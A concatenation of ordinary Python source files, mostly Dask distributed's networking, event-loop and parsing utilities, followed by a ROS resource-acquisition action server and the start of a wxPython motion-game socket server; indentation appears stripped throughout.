warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(*args):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
"""
if len(args) == 1 and isinstance(args[0], Iterable):
args = args[0]
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
result = yield tasks.next()
results[tasks.current_index] = result
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
    # Tornado's PollIOLoop doesn't raise when a closed loop is used, so check it ourselves
if ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
def make_coro():
coro = gen.maybe_future(func(*args, **kwargs))
if timeout is None:
return coro
else:
return gen.with_timeout(timedelta(seconds=timeout), coro)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
result[0] = yield make_coro()
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
    Several loop runners can safely share the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop,
name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=1000)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
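# Illustrative sketch (not part of the original module): drive a Tornado
# coroutine from synchronous code with a LoopRunner-managed background loop.
# The coroutine and function names below are made up for demonstration.
def _demo_loop_runner():
    @gen.coroutine
    def _demo_coro(x):
        yield gen.moment
        raise gen.Return(x * 2)
    runner = LoopRunner()
    try:
        # run_sync() starts the loop in a background thread if needed,
        # runs the coroutine to completion, and stops the loop again.
        return runner.run_sync(_demo_coro, 21)  # -> 42
    finally:
        runner.stop()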
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def str_graph(dsk, extra_values=()):
def convert(task):
if type(task) is list:
return [convert(v) for v in task]
if type(task) is dict:
return valmap(convert, task)
if istask(task):
return (task[0],) + tuple(map(convert, task[1:]))
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
return {tokey(k): convert(v) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
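# Illustrative usage (not part of the original module): tmpfile yields a path
# that does not exist yet; anything created at that path is cleaned up on exit.
def _demo_tmpfile():
    with tmpfile('.txt') as fn:
        with open(fn, 'w') as f:
            f.write('hello')
        existed_inside = os.path.exists(fn)  # True while inside the block
    return existed_inside and not os.path.exists(fn)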
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
    if ext in ('.py',):  # formerly also '.pyc'
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext == '.zip':
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
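# Illustrative only (hypothetical path): importing a plugin shipped as a single
# .py file returns the loaded module objects.
#
#     >>> import_file('/tmp/my_plugin.py')  # doctest: +SKIP
#     [<module 'my_plugin' from '/tmp/my_plugin.py'>]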
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
"""
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
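# Illustrative example (not part of the original module) of the layout produced
# by asciitable:
#
#     >>> print(asciitable(['name', 'value'], [('Alice', 100), ('Bob', 200)]))
#     +-------+-------+
#     | name  | value |
#     +-------+-------+
#     | Alice | 100   |
#     | Bob   | 200   |
#     +-------+-------+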
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
return frame.nbytes
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
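# Illustrative usage (not part of the original module): capture log records in
# memory with a DequeHandler. The logger name '_deque_demo' is made up.
def _demo_deque_handler():
    demo_logger = logging.getLogger('_deque_demo')
    handler = DequeHandler(n=100)
    demo_logger.addHandler(handler)
    try:
        demo_logger.warning('something happened')
        return [record.getMessage() for record in handler.deque]  # -> ['something happened']
    finally:
        demo_logger.removeHandler(handler)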
def fix_asyncio_event_loop_policy(asyncio):
"""
Work around https://github.com/tornadoweb/tornado/issues/2183
"""
class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
try:
return super().get_event_loop()
except RuntimeError:
# "There is no current event loop in thread"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules:
fix_asyncio_event_loop_policy(sys.modules['asyncio'])
|
AcquireRessource.py
|
#!/usr/bin/env python
# Action server for managing the client connection to the Simulink model
# Lucas Jürgens (BA), lucas.juergens@zubox.de, 2017-02
# Moritz Schappler, schappler@irt.uni-hannover.de
# (C) Institut für Regelungstechnik, Leibniz Universität Hannover
import rospy
import actionlib
import threading
from Queue import Queue
from pcu_common.msg import AcquireRessourceAction, AcquireRessourceGoal
class AcquirableRessource():
def __init__(self, action_topic):
self.acquired = False
self._as = actionlib.SimpleActionServer(action_topic, AcquireRessourceAction, auto_start=False)
self._as.register_goal_callback(self._goal_cb)
self._as.register_preempt_callback(self._preempt_cb)
self._as.start()
self._aborted_cb = None
self._acquired_cb = None
t = threading.Thread(target=self._check_for_abort)
t.start()
def register_acquired_cb(self, cb):
self._acquired_cb = cb
def register_aborted_cb(self, cb):
self._aborted_cb = cb
def _check_for_abort(self):
rate = rospy.Rate(50)
while not rospy.is_shutdown():
if self.acquired:
if not self._as.is_active():
self.acquired = False
if self._aborted_cb:
self._aborted_cb()
rate.sleep()
def break_acquirement(self):
if self.acquired:
self._as.set_aborted()
            self.acquired = False
def _goal_cb(self):
self._as.accept_new_goal()
self.acquired = True
if self._acquired_cb:
self._acquired_cb()
def _preempt_cb(self):
self._as.set_aborted()
class AcquireRessource():
def __init__(self, action_topic):
self._ac = actionlib.SimpleActionClient(action_topic, AcquireRessourceAction)
        self._queue = Queue()  # Using a queue here because Python 2 does not support a timeout for a semaphore wait
self._lost_cb = None
self._timed_out = False
self.is_acquired = False
def register_lost_callback(self, cb):
self._lost_cb = cb
def release(self):
if self.is_acquired:
self._ac.cancel_all_goals()
self.is_acquired = False
def acquire(self, timeout):
if self.is_acquired:
return False
self._timed_out = False
if not self._ac.wait_for_server(rospy.Duration(timeout)):
self._timed_out = True
return False
goal = AcquireRessourceGoal()
self._ac.send_goal(goal, self._done_cb, self._active_cb)
try:
self._queue.get(True, timeout)
        except Exception:  # Queue.Empty when the wait times out
self._timed_out = True
return False
return True
def _done_cb(self, a, b):
if self.is_acquired:
self.is_acquired = False
if self._lost_cb:
t = threading.Thread(target=self._lost_cb)
t.start()
def _active_cb(self):
if not self._timed_out:
self.is_acquired = True
self._queue.put(None)
else:
self._ac.cancel_goal()
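# Illustrative sketch (not part of the original module): the Queue-with-timeout
# pattern used in acquire() above, shown standalone. It stands in for a
# semaphore wait with a timeout, which Python 2 does not provide directly.
def _demo_timed_wait(timeout):
    q = Queue()
    # In the real class, _active_cb() plays the role of this signaller thread.
    threading.Thread(target=lambda: q.put(None)).start()
    try:
        q.get(True, timeout)  # blocks for at most `timeout` seconds
        return True
    except Exception:  # Queue.Empty if nothing arrived in time
        return False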
|
server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 12/8/18 7:02 PM
# @Author : Terry LAI
# @Email : terry.lai@hotmail.com
# @File : keyboard.py
from pymouse import PyMouse
from pykeyboard import PyKeyboard
from socket import socket, AF_INET, SOCK_STREAM
port = 20000
client_addr = []
client_socket = {}
###########################################################################
## Python code generated with wxFormBuilder (version Sep 12 2010)
## http://www.wxformbuilder.org/
##
## PLEASE DO "NOT" EDIT THIS FILE!
###########################################################################
import wx
from socketserver import ThreadingTCPServer
###########################################################################
## Class MotionGame
###########################################################################
class MotionGame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=wx.EmptyString, pos=wx.DefaultPosition,
size=wx.Size(500, 300), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
bSizer11 = wx.BoxSizer(wx.VERTICAL)
self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, u"ECE 5413 Motion Game", wx.DefaultPosition, wx.DefaultSize,
0)
self.m_staticText1.Wrap(-1)
bSizer11.Add(self.m_staticText1, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
self.m_button1 = wx.Button(self, wx.ID_ANY, u"Start Server", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer11.Add(self.m_button1, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
